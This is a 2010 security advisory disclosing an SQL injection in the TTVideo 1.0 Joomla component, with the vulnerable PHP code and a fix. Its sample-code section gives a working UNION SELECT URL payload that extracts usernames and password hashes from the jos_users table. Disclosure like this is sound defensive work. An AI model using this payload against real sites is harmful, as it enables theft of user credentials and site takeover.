TTVideo 1.0 Joomla Component SQL Injection Vulnerability

Download link: http://www.toughtomato.com/resources/downloads/joomla-1.5/components/ttvideo/

 Name              TTVideo
 Vendor            http://www.toughtomato.com
 Versions Affected 1.0

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-07-27

X. INDEX

 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 

I. ABOUT THE APPLICATION
________________________

TTVideo  is  a  Joomla!  component that makes use of the
popular  video  sharing  site  Vimeo  to  create a video
library.


II. DESCRIPTION
_______________

A  parameter  in  ttvideo.php  is not properly sanitised
before being used in a SQL query.


III. ANALYSIS
_____________

Summary:

 A) SQL Injection
 

A) SQL Injection
________________

The parameter cid passed to ttvideo.php when task is set
to video  is not properly sanitised before being used in
a SQL query.  This  can  be  exploited to manipulate SQL
queries by injecting arbitrary SQL code.  The  following
is the vulnerable code:

ttvideoController.php (line 40):

function video() {
    $cid = JRequest::getVar('cid', null, 'default');
    

ttvideo.php (line 188):

function getVideo($id) {
    $db = $this->getDBO();
    $db->setQuery("SELECT * from #__ttvideo WHERE id=$id");
    $video = $db->loadObject(); 
    if ($video === null)
      JError::raiseError(500, 'Video with ID: '.$id.' not found.');
    return $video;
}


IV. SAMPLE CODE
_______________

A) SQL Injection

http://site/path/index.php?option=com_ttvideo&task=video&cid=-1 UNION SELECT 1,2,3,4,5,6,7,8,CONCAT(username,0x3A,password),10,11,12,13,14,15,16,17 FROM jos_users


V. FIX
______

Use JRequest::getInt instead of JRequest::getVar